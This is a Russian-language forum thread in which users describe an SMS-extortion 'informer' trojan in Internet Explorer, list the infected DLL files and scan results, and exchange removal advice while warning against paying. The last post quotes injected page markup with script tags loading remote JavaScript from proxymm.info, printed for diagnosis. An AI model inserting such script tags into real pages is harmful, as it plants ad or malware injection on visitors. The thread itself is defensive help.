Чтобы удалить информер отправьте смс на номер 3649

Человек подхватил на днях, да и тут некоторые спрашивали, "Чтобы удалить информер отправьте смс на номер 3649 ..." грузится как надстройка к IE. Файл в /system32/ogqlib.dll
Пока только два антивируса находят.
[url]http://www.virustotal.com/ru/analisis/49a63b6e88c3a763f5366436cb8e12e7[/url]

По инету поискал, кто-то уже попался и подарил мошенникам более 300 р. (одна смс).

[size="1"][color="#666686"][B][I]Добавлено через 35 секунд[/I][/B][/color][/size]

Лечит cureit.

Мне кажется, довольно легко определить того, кому эти денюшки капают (при способе оплаты через смс), интересно, сколько лет за такое могуть дать (и могут ли дать в принципе?)

[QUOTE=NMF;288122]Мне кажется, довольно легко определить того, кому эти денюшки капают (при способе оплаты через смс), интересно, сколько лет за такое могуть дать (и могут ли дать в принципе?)[/QUOTE]
Дело за малым - озаботить правоохранительные органы...

NMF могут и еще как могут! Верно borka сказал!

Воть те на, а убрать-то эту заразу как???

В раздел Помогите обратиться по правилам :)

эта зараза поражает только IE и ее можно абсолютно безболезненно (и бесплатно) выключить в расширениях IE
свойства обозревателя -> программы -> надстройки :)

Но это же адваре (рекламный модуль), а может и вообще троян, незнаю. ее надо удалять

Trojan-Ransom.Win32.Hexzone.*

ок. тогда удалить через AVZ :)

ПыСы: IE есть огромная дыра для виров, не стоит им пользоваться без острой необходимости (ActiveX)
ПыПыСы: Linux user :)

Самый простой способ борьбы с этой штуковиной это касперский он его замечательно находит и лечит и не вздумайте деньги отсылать это развод:Dтак что народ грузите каспера и на полную проверку и будет вам счастье !

[quote=klych;303789]Самый простой способ борьбы с этой штуковиной это касперский он его замечательно находит и лечит и не вздумайте деньги отсылать это развод:Dтак что народ грузите каспера и на полную проверку и будет вам счастье ![/quote]

Про деньги это верно подмечено. :ohmy::rolleyes::ohmy: А вот Касперскии у меня пчему-то лечить его отказался. У меня был информер без картинок, просил полного доступа к сайту и номер был 5537. вылазил даже при отключенном нете.
Потом загасил его: [URL]http://www.ho24me.ru/ol/o6.html[/URL]
Вот здесь неплохо написано.

А лучше всего, не лазить по сайтам +18 :biggrin:

[QUOTE=serg585;324459]...

А лучше всего, не лазить по сайтам +18 :biggrin:[/QUOTE]


[QUOTE]Файл в /system32/ogqlib.dll[/QUOTE]

при правильной работе в XP файл туда не записался бы в принципе.
Сайтов боятся - в лес не ходить...

сам много раз натыкался на такую штуку... отключал в надстройках и удалял файл... проблема решена, если нет смотреть что в автозапуске стоит не то и может создавать этот файл

Чтобы убрать панель отправьте смс ...
[url]http://www.ii4.ru/viewer.php?id=388700spam.JPG[/url]
Вот такая панель вылезала у меня в Интернет-Эксплорере.
KIS2009 avz и прочие ничего не находили
В одной из тем с подобной проблемой рекомендовали порыться в надстройках ИЭ тем более что в Firefoxе такая панель не появлялась.
Методом исключения нашел что панель вызывается файлом
"C:\Document and Setting\All Users.Windows\Application Date\oallib.dll"
Удалил - пока панель не появляется.
Если кто столкнулся с подобной проблемой может мой совет поможет.

Всем, кто здесь пишет. Надо проверяться глубже, данная зараза в одиночку не бегает. Логи с Ваших машин в нашем разделе "Помогите!" нам и Вам помогут вылечиться.

временное решение (обращение в помогите не отменяет, т.к. примерно через месяц обычно снова приходит):
в надстройках ИЕ отключить все модули, имя которых ***lib.dll
первые 3 буквы - любые, названия модулей разные.

Информеры такие ставяться тем кто по всяким сайтам для взрослых лазают, предлагают скачать кодек якобы для улучшения показа видео... :00000032:

СПАСИБО ТЕБЕ СЕРГ БОЛЬШОЕ! И вправду написанно все как для бронированных... я думал вляпался! нашел вот твои комментарии и удалил эту надпись! суть! в топку порносайты :santa:

возможно ли такое что информер удаляет кнопку "надстройки" из "свойства обозревателя -> программы"?
по словам узера подхватившего (:furious3:) эту заразу, данной кнопки у него нет.
подскажите как её включить.

[QUOTE=anatol81n;348717]возможно ли такое что информер удаляет кнопку "надстройки" из "свойства обозревателя -> программы"?
по словам узера подхватившего (:furious3:) эту заразу, данной кнопки у него нет.
подскажите как её включить.[/QUOTE]

Совет только один: в "Помогите!", тему, логи по Правилам.

Такие вещи нужно не отключать, а удалять, тоесть в "Помогите"

hi all
Проблемма была та же ...
Только вот мне думается что имя файла рандом регенится и не в /system32/ сохраняется а в C:\Document and Setting\All Users.Windows\Application Date\
но что интересно имя файла во всех пока что попадавшихся случаях было *lib.dll
и к тому же он действительно прописывался в надстройках (у меня как надстройка кодеков...точное название не скажу... не запомнил :-) )
а вот на счёт антивирей.... хрен поймаешь (у меня КИС 2009) ... так как думаю что сам вирь успевает подкинкть надстройку а она вроде даж и не вредоносна ;-)

ну вот вроде так вот) ... может это и поможет Вам .. bye all

Так же столкнулся, полазили userы.
Согласен с JohnEkb.
В C:\Document and Setting\All Users.Windows\Application Date\ создает файл *lib.dll (в моем случае kzclib.dll).
В IE помимо надстроек, устанавливает соед-е через прокси, кот-ый сам и создает.
Пытался удалить КАВом 2009, установленным на машине, ничего не получилось. Помогла только загрузка с диска и в таком режиме поиск и удаление.
Возможно еще создает свои хвосты в папках:
<X>:\RECYCLER\S-<%d%>-<%d%>-<%d%>-<%d%>-<%d%>-<%d%>-<%d%>\<rnd>.vmx,
где rnd – случайные буквы, d – произвольное число, X – буква диска.
По-этому и их удалил.

[QUOTE]<X>:\RECYCLER\S-<%d%>-<%d%>-<%d%>-<%d%>-<%d%>-<%d%>-<%d%>\<rnd>.vmx,[/QUOTE]

Это kido...

Это не рандом (S-<%d%>-<%d%>-<%d%>-<%d%>-<%d%>-<%d%>-<%d%). Это генерится МС по определенным алгоритмам. А <rnd> действительно оно.
Я писал тему о стандартных идентификаторах пользователей..

Попробовал себе на компик поставить всё таки, было сообщение - что бы посмотреть бесплатное видео нужно поставить тулбар, это wsf-скрипт, антивирусы не определяют, после этого на четверть страницы выскакивает информер с просьбой - если хотите отказаться от подписки нужно отправить смс, в моём случае это немного другой короткий номер, уже не припомню, так как его уже убил. Видео само собой всё равно не воспроизводится. Лохотрон конкретный.

Вот служба поддержки этого номера - :http:3649sms.ru

Прежде чем отправлять смс, и дарить деньги мошеникам, напишите абузу. Мало им не покажется.

[SIZE=1]Вчера по телефону помогла вылечить комп друзьям от вируса-информера.
Случай тяжёлый. Там на весь экран было чёрное окно с белым окном внутри, и красным шрифтом сообщалось, что, если желаете, чтобы не исчезла инфа с винчестера, то не выключайте комп, а отправьте SMS на номер 3649 (стоимостью 10 руб), чтобы получить пароль на избавление от этого вируса.
Прочитала в Интернете, что в итоге те, кто отправил смс на этот номер, лишились со счета своего от 300 руб до 600 руб.

Решения данной конкретной проблемы в Интернете не нашла, но помогли форумы и [/SIZE][URL="http://virusinfo.info/showthread.php?t=30664"][SIZE=1][COLOR=#000066]этот форум с этой темой[IMG]http://i.ixnp.com/images/v3.73/t.gif[/IMG][/COLOR][/SIZE][/URL][SIZE=1] четырёх летней давности. Из форумов поняла, что этот вирус получили из Аськи, когда кликнули на ссылку на картинку (якобы от подруги).
И, что окно от вируса - это информер идущий через Интернет-браузер.
Кроется он в системной папке, в каком-либо файле ***lib.dll, если его удалить, то проблема исчезнет.
Но в данном случае не получилось попасть в папку системную и вообще системой пользоваться не получалось.

Лечить комп решила первым делом через безопасный режим, но и там информер занял весь экран и ничем не убирался.
Ещё раз просто загрузили комп, там испробовали все известные комбинации на клаве по закрытию окон и прочее, нажимали на кнопку запуска системы, ничего не помогло. Последней была комбинация Ctrl+Esc, тут появилось мерцание окна с пусковыми задачами, но не удалось кликнуть на "Справку". Но это явление меня убедило в том, что система и инфа на диске целы.
Тогда опять перезагрузили системник, появилось голубое окно скандиска, загрузили безопасный режими, и получилось таки попасть в систему, сделать возврат системы Windows Xp на рабочую точку восстановления. После перезагрузки очистили все темповые папки, посмотрели файлы ***lib.dll, оказались, все они нормальные, перезагрузили системник, сделали новую точку восстановления ситемы.

От этого компа, который лечила по телефону, я была далеко, т.ч. антивирусы и антитрояны не поставила пока ещё. Но явно, что надо антивирус Касперского ставить, т.к. НОД32 им не помог. Прочитала, что вирус-информер имеет свойство блокировать антивирус,но, кажется, Касперский антивирус справляется.

Интересно, а за четыре года короткий номер для смс 3649 ещё действует, и никакие правоохранительные органы им не заинтересовались?[/SIZE]

[quote=Ta.Is.;375708][SIZE=1]
Интересно, а за четыре года короткий номер для смс 3649 ещё действует, и никакие правоохранительные органы им не заинтересовались?[/SIZE][/quote]
Почему? Иногда сажают, но видимо до смс-ников особо дела нет, а может уже другие приходят? Ведь номер то никуда не девается.
А так они потом горькими слезами все плачут.
Вот видео, правда к смс никакого отношения не относиться, но всё же из той оперы -
[URL]http://www.youtube.com/watch?v=nIqScuE2O24[/URL]
[url]http://www.youtube.com/watch?v=yQE3YI1Q-nI&NR=1[/url]
Видео ареста, но думаю как обычно выйдет сухим из воды -
[URL]http://rutube.ru/tracks/1296036.html?v=86f67d597d80f2e7691ba188b8e6ff4d[/URL]
[url]http://www.youtube.com/watch?v=rTuMzTcHm5E&feature=related[/url]

[quote=Ta.Is.;375708][SIZE=1]Вчера по телефону помогла вылечить комп друзьям от вируса-информера. [/SIZE]
...
[SIZE=1]Интересно, а за четыре года короткий номер для смс 3649 ещё действует, и никакие правоохранительные органы им не заинтересовались?[/SIZE][/quote]

Тут вопрос не в номере, а в мошенниках. Прежде чем отправлять смс, пожалуйтесь.

Совсем из головы вылетело, сейчас по другому стали просить смс, если всё таки её отправляешь, то в ответ приходит смс - подтвердите согласие, то есть второй раз и вообще все вот эти попрошайничества на сайтах, телевидении и т.п. это всё советую бросать в унитаз.

Сегодня столкнулся с той же проблемой что и Ta.Is.
Информер при загрузке выдавал милое окошко черно белого содержания с тем же текстом... в безопастный режим правда входил без проблем, уложил три часа на чистку реестра, юзая что попадалось под руку от тотала до авторанс, и регэдита...
Друг, помогая, нашел инфу, что виноват во всем некий "isasss.exe"... Т.к. бекап сделать невозможно, наблюдение отключено, старался стереть все что знала система про него, нашел в реестре и запись про сам exe и про картинку, которой был загружен, но при нормальной загрузке информер никуда не делся.. на третий час плюнул и убил винду... Но все таки хотел бы узнать что сие есть, и как его лечить...

[url=http://virusinfo.info/showthread.php?t=1235]Внимательно прочитать, аккуратно выполнить[/url]
Там по ходу дела и узнается, что ЭТО такое.

[COLOR=black][FONT=Verdana]Гениальный троян накатали предприимчивые пираты. В браузер Internet Explorer добавляется такая вот штука. Дальше браузер переходит на страницу Microsoft, и тут начинается самое интересное.

На странице написано, что теперь браузер платный, и надо оплатить пользование им с помощью SMS.
Говорится про 30 рублей, хотя сообщение на указанный номер стоит около 100 рублей.
Если и к вам попала подобная дрянь, то читайте дальше способы, как это вылечить.

[/FONT][/COLOR][B][COLOR=red][FONT=Verdana]Лечение:[/FONT][/COLOR][/B][COLOR=black][FONT=Verdana]

[/FONT][/COLOR][B][COLOR=blue][FONT=Verdana]Вариант 1:[/FONT][/COLOR][/B][COLOR=black][FONT=Verdana]

Заходим в "Панель управления" (либо "Пуск"->"Панель управления" либо "Пуск"->"Настройки"->"Панель управления")
В "Панели управления" запускаем "Свойства обозревателя".
В "Свойства обозревателя" выбираем вкладку "Дополнительно" и нажимаем сначала на кнопку "Сброс"

[/FONT][/COLOR][B][COLOR=blue][FONT=Verdana]Вариант 2:[/FONT][/COLOR][/B][COLOR=black][FONT=Verdana]

Заходим в "Панель управления" (либо "Пуск"->"Панель управления" либо "Пуск"->"Настройки"->"Панель управления")
В "Панели управления" запускаем "Свойства обозревателя".
В "Свойства обозревателя" выбираем вкладку "Программы" и нажимаем сначала на кнопку "Надстройки".
Отключаем все включенные элементы. Запускаем Internet Explorer, открываем любую страницу в нём, закрываем.
Опять открываем "Надстройки" и смотрим, какой элемент включился сам.
Смотрим файл, который соответствует этой надстройке, и удаляем его.[/FONT][/COLOR]

[QUOTE=токарь;378545]
Гениальный троян накатали предприимчивые пираты. В браузер Internet Explorer добавляется такая вот штука. Дальше браузер переходит на страницу Microsoft, и тут начинается самое интересное.
[/QUOTE]

В таком случае лучше воспользоваться [URL="http://virusinfo.info/showpost.php?p=377889&postcount=34"]советом pig[/URL]

Порнографическая фигня с требованием оплаты убивается в надстройках(IE7), там же видна dll от него.
Уже привычно.

[quote=groks;380961]Порнографическая фигня с требованием оплаты убивается в надстройках(IE7), там же видна dll от него.
Уже привычно.[/quote]

Спасибо вам, ребята!
Специально зарегистрировался, чтобы поблагодарить, поделиться новостями, и иметь, в дальнейшем, возможность взаимопомощи.

У нас было все то же самое - банер закрывал выход в интернет - просил SMS. Про эти штучки мы уже слышали - решили денег врагу не отдавать. Запомнил время загрузки файла программы для просмотра (да, да! Только так это все и залезает в наши компы - с нашего, так сказать, соизволения - и нечего стесняться, раз вляпались!). В поиске файлов выбрал критерий создание файла сегодня, отсортировал по времени, и нашел пару файлов на "C:\Documents and Settings\" но не в "All Users", а в своём "User"e, в папке "Application Data".
Только файлы эти были [B]eurrvqu.dll[/B] и [B]sowwrqu.dll[/B]. Вот так!
А вовсе не [B]***lib.dll[/B].
Видимо есть уже вариации...
Ну и перенес их на другой диск, на всякий случай, так как не знал, чем это закончится. Открыл интернет - и всё стало ОК!
Но, рано радовался... На следующий день, при заходе в интернет, все повторилось. За исключением того, что банер дал загрузиться, и даже оставил немного места для нужной программы. Ну, собственно, с этого места мы стали рыть сайты. А нашёл я вас просто набрав в поисковике номер [B]3649[/B]. Прочитал форум, посмотрел всё внимательно... И действительно, эти два файла висят в Свойствах обозревателя, и так далее в "add_ons". Один называется "Crypted Video Helper" и тип у него "Browser Helper Object", а второй "DST Data Extennsion" и тип у него тотже.
Отключил я их - и всё!!!
Но паралельно скачал Dr.Web бесплатную версию "CureIt" (если правильно помню).
Если завтра будет опять что-то не так - будем лечиться!!!

Ещё раз, Спасибо всем!
P.S. А порносайты - это самый лучший и надёжный источник БОЛЕЗНЕЙ для тех, у кого руки чешутся... Знаем - плавали...

[B]Делюсь, надеюсь, полезной для кого-нибудь информацией.[/B]

[U]И вот, что нарыл Доктор наш, WEB:[/U]

c:\documents and settings\all users\application data\microsoft\media player\eurrvqu.dll
инфицирован Trojan.Blackmailer.1086

c:\program files\common files\microsoft shared\web folders\uqvrrue.dll
инфицирован Trojan.Blackmailer.1086

c:\documents and settings\oleg\local settings\temporary internet files\content.IE5\81MR4L6F\driverPack60[1].exe
инфицирован Trojan.Blackmailer.1086

C:\Program Files\Common Files\Microsoft Shared\Web Folders\uqrwwos.dll
инфицирован Trojan.Blackmailer.1091

C:\System Volume Information\_restore{45C6300C-0919-42B5-9CB1-4C710F85FBFA}\RP251\A0093780.dll
инфицирован Trojan.Blackmailer.1086

C:\System Volume Information\_restore{45C6300C-0919-42B5-9CB1-4C710F85FBFA}\RP251\A0093787.dll
инфицирован Trojan.Blackmailer.1086

C:\System Volume Information\_restore{45C6300C-0919-42B5-9CB1-4C710F85FBFA}\RP251\A0093799.dll
инфицирован Trojan.Blackmailer.1091

D:\System Volume Information\_restore{45C6300C-0919-42B5-9CB1-4C710F85FBFA}\RP249\A0092470.exe
инфицирован Trojan.Blackmailer.1086

_______________________________________________________

D:\мусор\apl-data\sowwrqu.dll
инфицирован Trojan.Blackmailer.1091

D:\мусор\apl-data\eurrvqu.dll
инфицирован Trojan.Blackmailer.1086

[I]Это те самые файлы, которые я сам нашёл и перепрятал.[/I]

D:\мусор\Loc-set-temp\_don5.tmp
инфицирован Trojan.Blackmailer.1091

D:\мусор\Loc-set-temp\don7.tmp
инфицирован Trojan.Blackmailer.1086

[I]А это те файлы, о которых я не сообщал раньше, так как не знал на 100% что они тоже зараженные. Но я их также перепрятал, на всякий случай. Он их тоже отыскал. А нашёл я их также в первый раз – по времени создания. И лежали они в папке «Local Settings» в моем «Usere» в «Temp».[/I]

[B]Вот такие, оказывается, обширные последствия получились.[/B]

Помогите тоже порно информер во всех браузерах кроме мазилы всё сделал как описано в статье [URL]http://golden-b.ru/?p=371[/URL] и просмотрел все посты вверху ничего подобного ненашёл ничего ни помогло даже касперский, доктор веб, аваст и анти шпионы ничего не нашли . информер не просит ни смс ничего вылазиет в начале страницы и к примеру при загрузке страницы http:// pachelma-foto.ru если я хочу посмотреть код страницы то вижу там только вот этот кусок


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>[B]<DIV id=layer1 style="Z-INDEX: 1; LEFT: 0px; WIDTH: 930px; TOP: 0px; HEIGHT: 60px"><A href="http://www.mmaibbs.info" target=_blank><IMG height=60 hspace=0 src="http://www.proxymm.info/ban.gif" width=930 border=0 left=0 top="0"></A></div><script src="http://www.proxymm.info/ietan.js"></script><script src="http://www.proxymm.info/firetan.js"></script>[/B]
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<meta http-equiv="Content-Language" content="ru" />
<title>Пачелма-фото. фотоальбом рассказы юмор</title>
<meta name="Keywords" content="пачелма,погода пчелмы,фото пачелмы,юмор, анекдоты,фотографии,короткие рассказы" />
<meta name="Description" content="пачелма, фотографии пачелмы,анекдоты, короткие рассказы,погода пачелмы" />
<meta http-equiv="Pragma" content="no-cache" />
<link href="1.css" rel="stylesheet" type="text/css" />
<link rel="icon" href="/favicon.ico" type="ico" />
<script language="JavaScript" type="text/javascript">
<!--
function FP_swapImg() {//v1.0
var doc=document,args=arguments,elm,n; doc.$imgSwaps=new Array(); for(n=2; n<args.length;
n+=2) { elm=FP_getObjectByID(args[n]); if(elm) { doc.$imgSwaps[doc.$imgSwaps.length]=elm;
elm.$src=elm.src; elm.src=args[n+1]; } }
}

function FP_preloadImgs() {//v1.0
var d=document,a=arguments; if(!d.FP_imgs) d.FP_imgs=new Array();
for(var i=0; i<a.length; i++) { d.FP_imgs[i]=new Image; d.FP_imgs[i].src=a[i]; }
}

function FP_getObjec



Я выделил жирным тот кусок который встраивается.Я не могу даже Adobe Dreamweaver CS3 запустить блокируется стартовое окно из за ошибок джва скриптов и где эта зараза я не могу найти

[IMG]http://forum.golden-b.ru/download/file.php?id=54&t=1&sid=2798d5841385178dbd2b08fa9f6de094[/IMG]